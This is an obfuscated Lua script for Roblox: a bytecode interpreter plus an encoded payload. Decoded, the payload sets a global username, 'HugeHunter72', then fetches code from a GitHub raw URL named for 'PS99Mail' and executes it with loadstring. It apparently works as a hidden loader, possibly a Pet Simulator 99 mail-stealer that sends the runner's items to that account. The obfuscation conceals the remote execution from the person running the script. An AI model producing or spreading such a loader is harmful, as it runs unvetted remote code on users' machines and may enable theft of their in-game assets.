--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=v24();local v35=v24();local v36=(3 -1) -1 ;local v37=(v21(v35,620 -(555 + 64) ,951 -((1573 -716) + 74) ) * ((570 -((717 -(87 + 263)) + 201))^32)) + v34 ;local v38=v21(v35,201 -(67 + 113) ,31);local v39=((v21(v35,959 -(214 + 523 + 190) )==(1 + 0)) and  -(1 + 0)) or (878 -(282 + 595)) ;if (v38==0) then if (v37==(1637 -(1523 + 114))) then return v39 * (0 + 0) ;else local v90=0 -0 ;while true do if (v90==(1065 -(68 + 997))) then v38=1271 -(226 + (2562 -1518)) ;v36=0 -0 ;break;end end end elseif (v38==((1592 + 572) -(32 + 85))) then return ((v37==(0 + 0)) and (v39 * (1/(0 + 0)))) or (v39 * NaN) ;end return v8(v39,v38-(1980 -(892 + 65)) ) * (v36 + (v37/(2^(123 -71)))) ;end v26=nil;function v26(v40)local v41;if  not v40 then local v82=(0 -0) -0 ;while true do if ((0 -0)==v82) then v40=v24();if (v40==(0 + 0)) then return "";end break;end end end v41=v3(v16,v19,(v19 + v40) -((2 + 1) -2) );v19=v19 + v40 ;local v42={};for v66=953 -(802 + 150) , #v41 do v42[v66]=v2(v1(v3(v41,v66,v66)));end return v6(v42);end v18=5;end if (v18==6) then v29=nil;function v29()local v43=1206 -(696 + 510) ;local v44;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v43==2) then v48=nil;v49=nil;v43=3;end if (v43==(7 -3)) then while true do if ((1263 -(1091 + 171))==v44) then v47=nil;v48=nil;v44=1 + 1 ;end if (v44~=0) then else v45=0;v46=nil;v44=3 -2 ;end if (v44~=(9 -6)) then else v51=nil;while true do local v98=374 -(123 + 251) ;local v99;while true do if (v98==(0 -0)) then v99=698 -(208 + 490) ;while true do if (v99~=1) then else if (v45==2) then for v146=1,v50 do local v147=0;local v148;local v149;local v150;local v151;while true do if (v147==(0 + 0)) then v148=0 + 0 ;v149=nil;v147=837 -(660 + 176) ;end if (v147~=(1 + 1)) then else while true do if (v148==(203 -(14 + 188))) then v151=nil;while true do if (v149==(675 -(534 + 141))) then local v173=0 + 0 ;local v174;while true do if ((0 + 0)==v173) then v174=0;while true do if ((1 + 0)~=v174) then else v149=1 -0 ;break;end if (v174==0) then local v185=0;while true do if (1==v185) then v174=1;break;end if (v185==(0 -0)) then v150=v22();v151=nil;v185=2 -1 ;end end end end break;end end end if (v149~=(1 + 0)) then else if (v150==1) then v151=v22()~=0 ;elseif (v150==(2 + 0)) then v151=v25();elseif (v150~=(399 -(115 + 281))) then else v151=v26();end v51[v146]=v151;break;end end break;end if (v148==(0 -0)) then local v171=0;while true do if (v171~=(1 + 0)) then else v148=1;break;end if (v171==(0 -0)) then v149=0 -0 ;v150=nil;v171=868 -(550 + 317) ;end end end end break;end if (v147==(1 -0)) then v150=nil;v151=nil;v147=2 -0 ;end end end v49[8 -5 ]=v22();for v152=286 -(134 + 151) ,v24() do local v153=1665 -(970 + 695) ;local v154;local v155;local v156;while true do if (v153==(0 -0)) then v154=1990 -(582 + 1408) ;v155=nil;v153=3 -2 ;end if ((1 -0)==v153) then v156=nil;while true do if (v154~=(3 -2)) then else while true do if (v155~=0) then else v156=v22();if (v21(v156,1825 -(1195 + 629) ,1)~=(0 -0)) then else local v178=241 -(187 + 54) ;local v179;local v180;local v181;local v182;while true do if (v178==(780 -(162 + 618))) then local v183=0 + 0 ;while true do if (v183~=0) then else v179=0 + 0 ;v180=nil;v183=1 -0 ;end if (v183==(1 -0)) then v178=1 + 0 ;break;end end end if (v178==(1638 -(1373 + 263))) then while true do if (v179~=(1000 -(451 + 549))) then else local v186=0 + 0 ;while true do if (v186==(0 -0)) then v180=v21(v156,2 -0 ,1387 -(746 + 638) );v181=v21(v156,2 + 2 ,8 -2 );v186=1;end if ((342 -(218 + 123))~=v186) then else v179=1582 -(1535 + 46) ;break;end end end if (v179==3) then if (v21(v181,3,3)==1) then v182[4 + 0 ]=v51[v182[1 + 3 ]];end v46[v152]=v182;break;end if (v179==1) then local v188=0;while true do if (v188~=(560 -(306 + 254))) then else v182={v23(),v23(),nil,nil};if (v180==0) then local v193=0;local v194;local v195;local v196;while true do if (0==v193) then v194=1467 -(899 + 568) ;v195=nil;v193=1;end if (1==v193) then v196=nil;while true do if (1==v194) then while true do if (v195==(0 + 0)) then v196=0 -0 ;while true do if (0~=v196) then else v182[3]=v23();v182[607 -(268 + 335) ]=v23();break;end end break;end end break;end if (v194==0) then v195=290 -(60 + 230) ;v196=nil;v194=573 -(426 + 146) ;end end break;end end elseif (v180==1) then v182[3]=v24();elseif (v180==2) then v182[3]=v24() -((1 + 1)^16) ;elseif (v180~=(1459 -(282 + 1174))) then else local v203=0;while true do if (v203==(811 -(569 + 242))) then v182[8 -5 ]=v24() -((1 + 1)^(1040 -(706 + 318))) ;v182[1255 -(721 + 530) ]=v23();break;end end end v188=1;end if (v188~=1) then else v179=2;break;end end end if ((1273 -(945 + 326))==v179) then local v189=0 -0 ;while true do if (v189~=(0 + 0)) then else local v192=700 -(271 + 429) ;while true do if (v192~=1) then else v189=1;break;end if (v192~=(0 + 0)) then else if (v21(v181,1501 -(1408 + 92) ,1087 -(461 + 625) )==(1289 -(993 + 295))) then v182[2]=v51[v182[1 + 1 ]];end if (v21(v181,2,1173 -(418 + 753) )~=(1 + 0)) then else v182[1 + 2 ]=v51[v182[3]];end v192=1;end end end if (v189~=(1 + 0)) then else v179=3;break;end end end end break;end if (v178~=(1 + 0)) then else local v184=0;while true do if (v184==(530 -(406 + 123))) then v178=1771 -(1749 + 20) ;break;end if (v184==0) then v181=nil;v182=nil;v184=1 + 0 ;end end end end end break;end end break;end if (v154==(1322 -(1249 + 73))) then local v172=0;while true do if (v172~=0) then else v155=0;v156=nil;v172=1;end if (v172~=1) then else v154=1 + 0 ;break;end end end end break;end end end v45=1148 -(466 + 679) ;end if (v45==(2 -1)) then local v138=0;while true do if (v138==0) then v49={v46,v47,nil,v48};v50=v24();v138=1 + 0 ;end if ((1 + 0)==v138) then v51={};v45=5 -3 ;break;end end end break;end if (v99==(0 -0)) then local v102=0;while true do if (v102==(115 -(4 + 110))) then v99=1;break;end if (v102==(584 -(57 + 527))) then if (v45==(1430 -(41 + 1386))) then local v167=103 -(17 + 86) ;while true do if (v167==(0 + 0)) then local v170=0;while true do if (v170==(0 -0)) then for v176=1,v24() do v47[v176-1 ]=v29();end return v49;end end end end end if (0~=v45) then else v46={};v47={};v48={};v45=2 -1 ;end v102=1;end end end end break;end end end break;end if (v44==2) then v49=nil;v50=nil;v44=3;end end break;end if (v43==0) then v44=166 -(122 + 44) ;v45=nil;v43=1;end if (1==v43) then v46=nil;v47=nil;v43=2 -0 ;end if (v43~=3) then else v50=nil;v51=nil;v43=12 -8 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then local v83=0;while true do if (v83==0) then v20=v0(v3(v52,1,1));return "";end end else local v84=v2(v0(v52,16));if v20 then local v91=v5(v84,v20);v20=nil;return v91;else return v84;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 1 + 3 ;return (v56 * (33988247 -17211031)) + (v55 * ((66858 -(1043 + 214)) -(30 + 35))) + (v54 * (176 + 80)) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=v57[1];local v61=v57[2];local v62=v57[3];return function(...)local v68=v60;local v69=v61;local v70=v62;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v86=0;while true do if (v86==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v59;else v78[v80[2]]=v59[v80[3]];end elseif (v81>1) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v106=0;local v107;local v108;local v109;local v110;while true do if (v106==2) then for v163=v107,v73 do local v164=0;while true do if (v164==0) then v110=v110 + 1 ;v78[v163]=v108[v110];break;end end end break;end if (v106==1) then v73=(v109 + v107) -1 ;v110=0;v106=2;end if (v106==0) then v107=v80[2];v108,v109=v71(v78[v107](v13(v78,v107 + 1 ,v80[3])));v106=1;end end end elseif (v81<=3) then local v100=v80[2];v78[v100]=v78[v100](v13(v78,v100 + 1 ,v73));elseif (v81==4) then v78[v80[2]]=v80[3];else for v133=v80[2],v80[3] do v78[v133]=nil;end end elseif (v81<=8) then if (v81<=6) then v78[v80[2]]();elseif (v81>7) then local v113;local v114,v115;local v116;local v117;v59[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v59;else v78[v80[2]]=v59[v80[3]];end v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v59;else v78[v80[2]]=v59[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v117=v80[2];v116=v78[v80[3]];v78[v117 + 1 ]=v116;v78[v117]=v116[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v117=v80[2];v114,v115=v71(v78[v117](v13(v78,v117 + 1 ,v80[3])));v73=(v115 + v117) -1 ;v113=0;for v135=v117,v73 do local v136=0;while true do if (v136==0) then v113=v113 + 1 ;v78[v135]=v114[v113];break;end end end v72=v72 + 1 ;v80=v68[v72];v117=v80[2];v78[v117]=v78[v117](v13(v78,v117 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else v72=v80[3];end elseif (v81<=9) then do return;end elseif (v81==10) then local v128=0;local v129;local v130;while true do if (v128==1) then v78[v129 + 1 ]=v130;v78[v129]=v130[v80[4]];break;end if (v128==0) then v129=v80[2];v130=v78[v80[3]];v128=1;end end else v59[v80[3]]=v78[v80[2]];end v72=v72 + 1 ;break;end if (v86==0) then v80=v68[v72];v81=v80[1];v86=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v63,v64,v65)if v65 then local v87=(v63/(((14 -7) -(2 + 3))^(v64-1)))%((1214 -(323 + 889))^(((v65-(2 -1)) -(v64-(581 -(361 + 219)))) + (321 -(27 + 26 + 267)))) ;return v87-(v87%1) ;else local v88=0;local v89;while true do if (v88==(0 + 0)) then v89=(415 -(15 + 398))^(v64-1) ;return (((v63%(v89 + v89))>=v89) and (983 -(18 + 348 + 616))) or (738 -(542 + (515 -319))) ;end end end end v22=nil;v18=2;end end end v15("LOL!073O00028O0003083O00557365726E616D65030C3O004875676548756E7465723732030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012043O00014O0005000100013O0026023O0002000100010004073O00020001001204000100013O00260200010005000100010004073O00050001001204000200033O001208000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O001400010004073O000500010004073O001400010004073O000200012O00093O00017O00",v9(),...);
